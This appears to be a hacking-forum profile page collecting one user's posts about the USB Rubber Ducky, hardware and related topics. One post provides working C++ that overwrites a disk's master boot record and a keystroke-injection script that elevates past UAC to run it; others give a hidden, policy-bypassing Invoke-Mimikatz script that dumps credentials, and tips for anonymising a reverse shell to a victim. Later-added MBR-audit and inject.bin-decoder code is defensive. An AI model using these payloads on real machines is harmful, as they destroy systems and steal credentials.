ThoughtfulDev

Posts posted by ThoughtfulDev

  1. How about using Domain Fronting?

    10 hours ago, Hackerman said:

    Thanks for your replies!

    Reverse shell anonymity sounds pretty complicated, so is there another way to take control of the victim's machine that could be more anonymous than a reverse shell? For example, is it possible to set the victim's machine as "server" and then connect to it through Tor or a VPN? Does anyone have any idea?

    You can connect your C&C server to a VPN with port forwarding and then let the shell connect to that port on the VPN side, which will then be forwarded to your C&C... in theory.

  2. be quiet! Silent Base 800 Black, No Window
    ASUS Prime X370-Pro
    AMD Ryzen 7 1700X
    2x8GB Vengeance DDR4-3200
    be quiet! Silent Loop 120mm
    MSI GTX 770
    Samsung 850 Evo 250GB SSD
    550 Watt Corsair Semi Modular PSU (don't know the actual name rn)

    Wanted to buy a new GPU for Machine Learning but prices are so damn high...

  3. 13 hours ago, Dave-ee Jones said:

    $RANDOM

    You could generate a random number and do a switch of some kind?

    
    if __NUMBER__ is 1:
    	Q STRING "IT'S 1!"
    else if __NUMBER__ is 2:
    	Q STRING "Oh boi. It's 2."
    ...

    Down further in that page it actually gives an example of throwing a dice.

    That would be possible if he were using a BashBunny haha :) Since the Ducky is only a HID, this won't work directly on the Ducky.

  4. As far as I know the Ducky can't do that on its own. Maybe you can write a bash/batch script to copy a random key/number into your clipboard, start that, and have the Ducky just press CTRL+V to copy that random character?

  5. 1 hour ago, i8igmac said:

    I was thinking a Chromebook with an Intel chip. I don't see anyone talking about them here.

    My wife has one with an Intel chip. I have been itching to fire up Linux. I have read its hardware works out of the box.

    They are cheap.

    The touch screen might perform well with GNOME Shell 3 and will give it a great tablet style user interface...

    Long battery life.

    The Intel ones do work with e.g. GalliumOS (which is Ubuntu + the necessary Chromebook drivers). (I use it myself.)

  6. Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING)

    I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS.

    CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC, USE A VM.

    1. Download the precompiled boot.exe (source code is here if you want to compile yourself):

    #include <windows.h>
    #include <conio.h>
    #include <iostream>
    
    int main(int argc, char* argv[]){
    	DWORD dw;
    	const char *pathToBin = "boot.bin";
    	// Open the first physical disk for raw access (needs administrator rights)
    	HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
    	if (drive != INVALID_HANDLE_VALUE){
    		HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
    		if (binary != INVALID_HANDLE_VALUE){
    			DWORD size = GetFileSize(binary, 0);
    			if (size > 0){
    				BYTE *mbr = new BYTE[size];
    				// Read the replacement boot sector image into memory
    				if (ReadFile(binary, mbr, size, &dw, 0)){
    					std::cout << "Binary file successfully read!" << std::endl;
    					// Write it over the first sector of the disk
    					if (WriteFile(drive, mbr, size, &dw, 0)){
    						std::cout << "First sector overwritten successfully!" << std::endl;
    					}
    					else
    						std::cerr << "Fatal error! Can't overwrite 1st sector!" << std::endl;
    				}
    				else
    					std::cerr << "Error reading from binary file!" << std::endl;
    				delete[] mbr;
    			}
    			else
    				std::cerr << "Invalid binary file!" << std::endl;
    			CloseHandle(binary);
    		}
    		else{
    			std::cerr << "Can't find the binary file to read from!" << std::endl;
    		}
    		CloseHandle(drive);
    	}
    	else
    		std::cerr << "Administrator privileges required!" << std::endl;
    	return 0;
    }

    2. Create Folder exec on your ducky sdcard and copy boot.exe into it.

    3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin

    4. Here is the duckyscript (make sure your SD card is labelled DUCKY):

    REM I am NOT responsible for ANY DAMAGE
    REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
    DELAY 5000
    ESCAPE
    DELAY 500
    CONTROL ESCAPE
    DELAY 500
    STRING cmd
    DELAY 500
    CTRL-SHIFT ENTER
    DELAY 1000
    REM replace with desired UAC alt + key combo (y for yes in English, j for German etc)
    ALT y
    DELAY 1500
    STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
    ENTER
    DELAY 300
    STRING cd exec
    ENTER
    DELAY 300
    STRING boot.exe
    ENTER
    DELAY 1000
    STRING exit
    ENTER

     

    I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier.
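    The payload above replaces the first sector of PhysicalDrive0. As an added example (not part of the original post) here is the defender's counterpart: parse a saved copy of the first sector, check the boot signature and partition table, and compare its hash against a known-good baseline so a replaced MBR is noticed before the next reboot. The sample sectors are constructed; on a real host you would read the 512 bytes from the disk and keep the baseline hash offline.

```python
import hashlib
import struct

SECTOR = 512
BOOT_SIG = b"\x55\xAA"          # bytes 510-511 of a valid MBR


def parse_mbr(sector):
    """Sanity-check a first sector: size, boot signature and the four partition entries."""
    if len(sector) != SECTOR:
        raise ValueError("expected %d bytes, got %d" % (SECTOR, len(sector)))
    parts = []
    for i in range(4):
        entry = sector[446 + 16 * i:446 + 16 * (i + 1)]
        ptype = entry[4]
        if ptype == 0:                       # empty slot
            continue
        lba_start, sectors = struct.unpack("<II", entry[8:16])
        parts.append({"bootable": entry[0] == 0x80, "type": ptype,
                      "lba_start": lba_start, "sectors": sectors})
    return {"sha256": hashlib.sha256(sector).hexdigest(),
            "boot_signature_ok": sector[510:512] == BOOT_SIG,
            "partitions": parts}


def audit_mbr(sector, baseline_sha256):
    """Return a list of findings; an empty list means the sector matches the baseline."""
    info = parse_mbr(sector)
    findings = []
    if info["sha256"] != baseline_sha256:
        findings.append("sector hash differs from baseline")
    if not info["boot_signature_ok"]:
        findings.append("missing 0x55AA boot signature")
    if not info["partitions"]:
        findings.append("partition table is empty")
    return findings


# Constructed sample sectors (not taken from any real disk).
GOOD_MBR = bytearray(SECTOR)
GOOD_MBR[446] = 0x80                         # entry 0: bootable
GOOD_MBR[450] = 0x07                         # type 0x07 (NTFS/exFAT)
struct.pack_into("<II", GOOD_MBR, 454, 2048, 1000000)
GOOD_MBR[510:512] = BOOT_SIG
GOOD_MBR = bytes(GOOD_MBR)
BASELINE = hashlib.sha256(GOOD_MBR).hexdigest()
# Foreign boot code dropped over the whole sector: table gone, signature kept.
OVERWRITTEN_MBR = b"\xEB\x3C" + b"\x90" * 444 + b"\x00" * 64 + BOOT_SIG
```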

  7. Are you sure that PHP is enabled in your Apache or IIS webserver?

    Try placing a PHP file, e.g. test.php, in the web directory root with the following content:

    <?php
    phpinfo();
    ?>

    If you now visit yourwebserver/test.php you should see a table with some information if PHP is enabled.

    I use this to run Mimikatz from sdcard/exec/mimikatz.ps1 and save the output to sdcard/data/mimikatz:

    REM -------------------------------------------------------------------------------------
    REM Get drive letter of drive with label DUCKY
    REM -------------------------------------------------------------------------------------
    STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
    ENTER
    DELAY 500
    REM -------------------------------------------------------------------------------------
    REM Copy and execute Invoke Mimikatz
    REM -------------------------------------------------------------------------------------
    STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"

    Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.

  8. Use something like:

    Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt';

    This writes the output of Invoke-Mimikatz to your temp folder in a file named yourpcname_creds.txt, which you can then read or even send as an email attachment if you want.

    PS: the Invoke-Mimikatz script isn't hosted on Darren's webserver - use your own host.

  9. 10 hours ago, Willhall996 said:

    Can anyone tell me what other files, if any, are on the memory card with the inject.bin file? Lost the original card. And also, does it have to be formatted in any specific manner?

    FAT32. And no, only the inject.bin, since this was just the hello world payload. As already said, use the Java encoder to encode your raw txt payload into the inject.bin.
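    Added example, not code from the thread: a small decoder that turns a recovered inject.bin back into duckyscript-style lines, handy when you find a Ducky and want to know what its payload types before deciding how to respond. It assumes the encoder's two-byte layout (0x00 plus a delay byte for DELAY, otherwise HID keycode plus modifier bits) and a US keymap; the sample bytes are constructed.

```python
# Constructed inject.bin sample, laid out as assumed above: 0x00,<n> = n ms of delay
# (255 ms chunks), otherwise <HID keycode>,<modifier>. Encodes: DELAY 300 / STRING Hi 5 / ENTER
SAMPLE_INJECT_BIN = bytes([
    0x00, 0xFF, 0x00, 0x2D,   # DELAY 300 = 255 + 45
    0x0B, 0x02,               # 'H' (key h + left shift)
    0x0C, 0x00,               # 'i'
    0x2C, 0x00,               # space
    0x22, 0x00,               # '5'
    0x28, 0x00,               # ENTER
])

# US-layout subset of the USB HID keyboard usage IDs (usage page 0x07).
KEYMAP = {0x04 + i: chr(ord("a") + i) for i in range(26)}
KEYMAP.update({0x1E + i: "1234567890"[i] for i in range(10)})
KEYMAP.update({0x2C: " ", 0x28: "ENTER", 0x29: "ESCAPE", 0x2B: "TAB"})
SHIFTED = dict(zip("1234567890", "!@#$%^&*()"))
MODNAMES = {0x01: "CTRL", 0x02: "SHIFT", 0x04: "ALT", 0x08: "GUI"}
SHIFT = 0x02

def decode_inject_bin(blob):
    """Turn inject.bin bytes back into duckyscript-style lines (DELAY / STRING / key names)."""
    if len(blob) % 2:
        raise ValueError("inject.bin must be an even number of bytes")
    lines, delay, text = [], 0, ""
    for key, mod in zip(blob[0::2], blob[1::2]):
        if key == 0x00:                      # delay chunk: accumulate, flush pending text
            if text:
                lines.append("STRING " + text)
                text = ""
            delay += mod
            continue
        if delay:                            # first keystroke after a run of delay chunks
            lines.append("DELAY %d" % delay)
            delay = 0
        name = KEYMAP.get(key)
        if name is not None and len(name) == 1 and mod in (0, SHIFT):
            text += SHIFTED.get(name, name.upper()) if mod == SHIFT else name
            continue                         # printable: keep building the STRING
        if text:
            lines.append("STRING " + text)
            text = ""
        mods = [MODNAMES[b] for b in MODNAMES if mod & b]
        lines.append(" ".join(mods + [name or "KEY_0x%02X" % key]))
    if text:
        lines.append("STRING " + text)
    if delay:
        lines.append("DELAY %d" % delay)
    return lines
```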

  10. On 9.6.2017 at 5:38 PM, ItsKorma (YT) said:

    I need help, I'm new to this, I just got a USB Rubber Ducky. It's a bit hard for me to get around it at the moment, but what you just said is what I'm looking for. I want to be able to view the victim's screen or control it, be able to look at the files etc. Please help me step by step.

    Sounds like you need a basic Metasploit payload (don't worry about the stealth/undetected part for now). Have a look at Metasploit Minute for tutorials about Metasploit.
